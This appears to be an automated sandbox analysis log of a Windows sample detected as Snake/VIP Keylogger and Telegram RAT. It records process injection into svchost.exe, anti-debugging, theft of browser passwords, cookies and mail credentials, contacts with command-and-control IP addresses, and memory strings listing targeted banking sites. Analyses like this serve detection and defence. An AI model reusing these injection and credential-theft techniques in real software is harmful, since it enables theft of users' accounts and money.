Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599050	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596458	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596325	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596210	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: svchost.exe, 00000002.00000002.4803161949.000000000325A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: svchost.exe, 00000002.00000002.4805427544.00000000065D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427
Source: svchost.exe, 00000002.00000002.4805427544.000000000662E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d

Source: C:\Users\user\Desktop\vnV17JImCH.exe	API call chain: ExitProcess graph end node	graph_0-103820
Source: C:\Users\user\Desktop\vnV17JImCH.exe	API call chain: ExitProcess graph end node	graph_0-104747
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_08F897D8 LdrInitializeThunk,

2_2_08F897D8

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F13F09 BlockInput,

0_2_00F13F09

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00EA3B3A

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00ED5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00ED5A7C

Source: C:\Windows\SysWOW64\svchost.exe

2_2_004019F0

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA4B37 LoadLibraryA,GetProcAddress,

0_2_00EA4B37

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_016F55C0 mov eax, dword ptr fs:[00000030h]	0_2_016F55C0
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_016F5620 mov eax, dword ptr fs:[00000030h]	0_2_016F5620
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_016F3F70 mov eax, dword ptr fs:[00000030h]	0_2_016F3F70

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EF80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00EF80A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ECA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00ECA155
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00ECA124 SetUnhandledExceptionFilter,	0_2_00ECA124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\SysWOW64\svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 158.101.44.242 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.80.1 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: B2E008

Jump to behavior

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EF87B1 LogonUserW,

0_2_00EF87B1

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00EA3B3A

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00EA48D7

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00F04C7F mouse_event,

0_2_00F04C7F

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\vnV17JImCH.exe"

Jump to behavior

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00EF7CAF

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00EF874B

Source: vnV17JImCH.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: vnV17JImCH.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EC862B cpuid

0_2_00EC862B

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00ED4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00ED4E87

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EE1E06 GetUserNameW,

0_2_00EE1E06

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00ED3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00ED3F3A

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00EA49A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4804087692.0000000005281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6636, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4807310402.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6636, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: vnV17JImCH.exe	Binary or memory string: WIN_81
Source: vnV17JImCH.exe	Binary or memory string: WIN_XP
Source: vnV17JImCH.exe	Binary or memory string: WIN_XPe
Source: vnV17JImCH.exe	Binary or memory string: WIN_VISTA
Source: vnV17JImCH.exe	Binary or memory string: WIN_7
Source: vnV17JImCH.exe	Binary or memory string: WIN_8
Source: vnV17JImCH.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7be0000.4.unpack, type: UNPACKEDPE
